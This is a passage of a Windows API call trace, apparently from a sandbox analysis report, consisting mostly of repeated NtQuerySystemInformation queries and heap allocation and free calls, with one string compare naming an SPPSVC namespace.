Length=0x38, ResultLength=0x0) [0300.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6c0, Length=0x28, ResultLength=0x0) [0300.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6c0, Length=0x28, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6c0, Length=0x28, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6c0, Length=0x28, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe730, Length=0x28, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe890, Length=0x38, ResultLength=0x0) [0300.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7b0, Length=0x28, ResultLength=0x0) [0300.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7b0, Length=0x28, ResultLength=0x0) [0300.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe890, Length=0x38, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe710, Length=0x20, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe690, Length=0x20, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe690, Length=0x20, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe690, Length=0x20, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe890, Length=0x38, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe710, Length=0x20, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x20, ResultLength=0x0) [0300.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x20, ResultLength=0x0) [0300.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.766] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0300.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe948, Length=0x50, ResultLength=0x0) [0300.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe870, Length=0x38, ResultLength=0x0) [0300.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x28, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x28, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x28, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe710, Length=0x28, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe870, Length=0x38, ResultLength=0x0) [0300.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe790, Length=0x28, ResultLength=0x0) [0300.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe790, Length=0x28, ResultLength=0x0) [0300.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe870, Length=0x38, ResultLength=0x0) [0300.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6f0, Length=0x20, ResultLength=0x0) [0300.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe670, Length=0x20, ResultLength=0x0) [0300.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe670, Length=0x20, ResultLength=0x0) [0300.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe670, Length=0x20, ResultLength=0x0) [0300.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe870, Length=0x38, ResultLength=0x0) [0300.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6f0, Length=0x20, ResultLength=0x0) [0300.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe680, Length=0x20, ResultLength=0x0) [0300.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe680, Length=0x20, ResultLength=0x0) [0300.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.774] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a69feae0 | out: lpSystemTimeAsFileTime=0xf7a69feae0*(dwLowDateTime=0x45a4d6c5, dwHighDateTime=0x1d63874)) [0300.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.783] GetProcessHeap () returned 0x27fc8db0000 [0300.783] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efaa60 [0300.783] GetProcessHeap () returned 0x27fc8db0000 [0300.784] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e51b20 [0300.784] GetProcessHeap () returned 0x27fc8db0000 [0300.784] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x104) returned 0x27fc8e0cca0 [0300.785] GetProcessHeap () returned 0x27fc8db0000 [0300.785] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x110) returned 0x27fc992d900 [0300.785] GetProcessHeap () returned 0x27fc8db0000 [0300.786] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8ebe0 [0300.786] GetProcessHeap () returned 0x27fc8db0000 [0300.786] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x118) returned 0x27fc8dec050 [0300.786] GetProcessHeap () returned 0x27fc8db0000 [0300.786] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efbcf0 [0300.786] GetProcessHeap () returned 0x27fc8db0000 [0300.786] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e51c60 [0300.786] GetProcessHeap () returned 0x27fc8db0000 [0300.786] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc994e6f0 | out: hHeap=0x27fc8db0000) returned 1 [0300.786] GetProcessHeap () returned 0x27fc8db0000 [0300.786] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x1cc) returned 0x27fc9999d40 [0300.786] GetProcessHeap () returned 0x27fc8db0000 [0300.786] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xf4) returned 0x27fc9887490 [0300.787] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a69fed68 | out: phModule=0xf7a69fed68*=0x7ffcea380000) returned 1 [0300.787] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0300.787] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xf7a69fee90, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xf7a69fee90, ResultLength=0x0) returned 0x0 [0300.801] GetProcessHeap () returned 0x27fc8db0000 [0300.801] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8eb60 [0300.802] GetProcessHeap () returned 0x27fc8db0000 [0300.802] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x40) returned 0x27fc9e881a0 [0300.802] GetProcessHeap () returned 0x27fc8db0000 [0300.802] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efb2a0 [0300.802] GetProcessHeap () returned 0x27fc8db0000 [0300.802] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e51b30 [0300.802] GetProcessHeap () returned 0x27fc8db0000 [0300.802] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e6e0 [0300.803] GetProcessHeap () returned 0x27fc8db0000 [0300.803] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc992d900 | out: hHeap=0x27fc8db0000) returned 1 [0300.803] GetProcessHeap () returned 0x27fc8db0000 [0300.803] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dec050 | out: hHeap=0x27fc8db0000) returned 1 [0300.803] GetProcessHeap () returned 0x27fc8db0000 [0300.803] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efbcf0 | out: hHeap=0x27fc8db0000) returned 1 [0300.803] GetProcessHeap () returned 0x27fc8db0000 [0300.803] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e51c60 | out: hHeap=0x27fc8db0000) returned 1 [0300.803] GetProcessHeap () returned 0x27fc8db0000 [0300.803] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8ebe0 | out: hHeap=0x27fc8db0000) returned 1 [0300.803] GetProcessHeap () returned 0x27fc8db0000 [0300.803] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9999d40 | out: hHeap=0x27fc8db0000) returned 1 [0300.803] GetProcessHeap () returned 0x27fc8db0000 [0300.803] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9887490 | out: hHeap=0x27fc8db0000) returned 1 [0300.803] GetProcessHeap () returned 0x27fc8db0000 [0300.803] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e881a0 | out: hHeap=0x27fc8db0000) returned 1 [0300.803] GetProcessHeap () returned 0x27fc8db0000 [0300.803] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efb2a0 | out: hHeap=0x27fc8db0000) returned 1 [0300.803] GetProcessHeap () returned 0x27fc8db0000 [0300.803] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e51b30 | out: hHeap=0x27fc8db0000) returned 1 [0300.803] GetProcessHeap () returned 0x27fc8db0000 [0300.803] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8eb60 | out: hHeap=0x27fc8db0000) returned 1 [0300.803] GetProcessHeap () returned 0x27fc8db0000 [0300.803] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8ec20 | out: hHeap=0x27fc8db0000) returned 1 [0305.655] GetProcessHeap () returned 0x27fc8db0000 [0305.655] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e0cca0 | out: hHeap=0x27fc8db0000) returned 1 [0305.656] GetProcessHeap () returned 0x27fc8db0000 [0305.656] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8e6e0 | out: hHeap=0x27fc8db0000) returned 1 [0305.656] GetProcessHeap () returned 0x27fc8db0000 [0305.656] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efaa60 | out: hHeap=0x27fc8db0000) returned 1 [0305.656] GetProcessHeap () returned 0x27fc8db0000 [0305.656] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e51b20 | out: hHeap=0x27fc8db0000) returned 1 [0305.656] GetProcessHeap () returned 0x27fc8db0000 [0305.656] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efa2d0 [0305.656] GetProcessHeap () returned 0x27fc8db0000 [0305.656] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e51b40 [0305.657] GetProcessHeap () returned 0x27fc8db0000 [0305.657] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x104) returned 0x27fc8e0db80 [0305.658] GetProcessHeap () returned 0x27fc8db0000 [0305.658] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x110) returned 0x27fc992d900 [0305.658] GetProcessHeap () returned 0x27fc8db0000 [0305.659] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8e3a0 [0305.659] GetProcessHeap () returned 0x27fc8db0000 [0305.659] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x118) returned 0x27fc8dec050 [0305.659] GetProcessHeap () returned 0x27fc8db0000 [0305.659] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efb350 [0305.659] GetProcessHeap () returned 0x27fc8db0000 [0305.659] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e51ba0 [0305.659] GetProcessHeap () returned 0x27fc8db0000 [0305.659] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc994e6f0 | out: hHeap=0x27fc8db0000) returned 1 [0305.659] GetProcessHeap () returned 0x27fc8db0000 [0305.659] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x1cc) returned 0x27fc9999d40 [0305.660] GetProcessHeap () returned 0x27fc8db0000 [0305.660] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x104) returned 0x27fc8e0cca0 [0305.660] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xf7a69fed68 | out: phModule=0xf7a69fed68*=0x7ffcea380000) returned 1 [0305.660] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0305.661] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xf7a69fee90, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xf7a69fee90, ResultLength=0x0) returned 0x0 [0305.661] GetProcessHeap () returned 0x27fc8db0000 [0305.661] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x30) returned 0x27fc9f8eea0 [0305.661] GetProcessHeap () returned 0x27fc8db0000 [0305.661] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x50) returned 0x27fc9cf6ee0 [0305.662] GetProcessHeap () returned 0x27fc8db0000 [0305.662] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0xa0) returned 0x27fc9efb400 [0305.662] GetProcessHeap () returned 0x27fc8db0000 [0305.662] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x8) returned 0x27fc9e51bf0 [0305.662] GetProcessHeap () returned 0x27fc8db0000 [0305.662] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x8, Size=0x40) returned 0x27fc9e87700 [0305.662] GetProcessHeap () returned 0x27fc8db0000 [0305.662] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc992d900 | out: hHeap=0x27fc8db0000) returned 1 [0305.662] GetProcessHeap () returned 0x27fc8db0000 [0305.662] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8dec050 | out: hHeap=0x27fc8db0000) returned 1 [0305.662] GetProcessHeap () returned 0x27fc8db0000 [0305.662] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efb350 | out: hHeap=0x27fc8db0000) returned 1 [0305.662] GetProcessHeap () returned 0x27fc8db0000 [0305.662] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e51ba0 | out: hHeap=0x27fc8db0000) returned 1 [0305.663] GetProcessHeap () returned 0x27fc8db0000 [0305.663] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8e3a0 | out: hHeap=0x27fc8db0000) returned 1 [0305.663] GetProcessHeap () returned 0x27fc8db0000 [0305.663] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9999d40 | out: hHeap=0x27fc8db0000) returned 1 [0305.663] GetProcessHeap () returned 0x27fc8db0000 [0305.663] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e0cca0 | out: hHeap=0x27fc8db0000) returned 1 [0305.663] GetProcessHeap () returned 0x27fc8db0000 [0305.663] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9cf6ee0 | out: hHeap=0x27fc8db0000) returned 1 [0305.663] GetProcessHeap () returned 0x27fc8db0000 [0305.663] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efb400 | out: hHeap=0x27fc8db0000) returned 1 [0305.663] GetProcessHeap () returned 0x27fc8db0000 [0305.663] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e51bf0 | out: hHeap=0x27fc8db0000) returned 1 [0305.663] GetProcessHeap () returned 0x27fc8db0000 [0305.663] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9f8eea0 | out: hHeap=0x27fc8db0000) returned 1 [0305.663] GetProcessHeap () returned 0x27fc8db0000 [0305.663] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e87cf0 | out: hHeap=0x27fc8db0000) returned 1 [0305.664] GetProcessHeap () returned 0x27fc8db0000 [0305.664] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc8e0db80 | out: hHeap=0x27fc8db0000) returned 1 [0305.664] GetProcessHeap () returned 0x27fc8db0000 [0305.664] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e87700 | out: hHeap=0x27fc8db0000) returned 1 [0305.664] GetProcessHeap () returned 0x27fc8db0000 [0305.664] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9efa2d0 | out: hHeap=0x27fc8db0000) returned 1 [0305.664] GetProcessHeap () returned 0x27fc8db0000 [0305.664] HeapFree (in: hHeap=0x27fc8db0000, dwFlags=0x0, lpMem=0x27fc9e51b40 | out: hHeap=0x27fc8db0000) returned 1 [0305.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0305.917] GetProcessHeap () returned 0x27fc8db0000 [0305.917] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9b4d4f0 [0305.918] GetProcessHeap () returned 0x27fc8db0000 [0305.918] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f874d0 [0305.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe940, Length=0x50, ResultLength=0x0) [0311.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe940, Length=0x50, ResultLength=0x0) [0311.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe940, Length=0x50, ResultLength=0x0) [0311.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe830, Length=0x50, ResultLength=0x0) [0311.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe830, Length=0x50, ResultLength=0x0) [0311.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe830, Length=0x50, ResultLength=0x0) [0311.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe830, Length=0x50, ResultLength=0x0) [0311.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe760, Length=0x38, ResultLength=0x0) 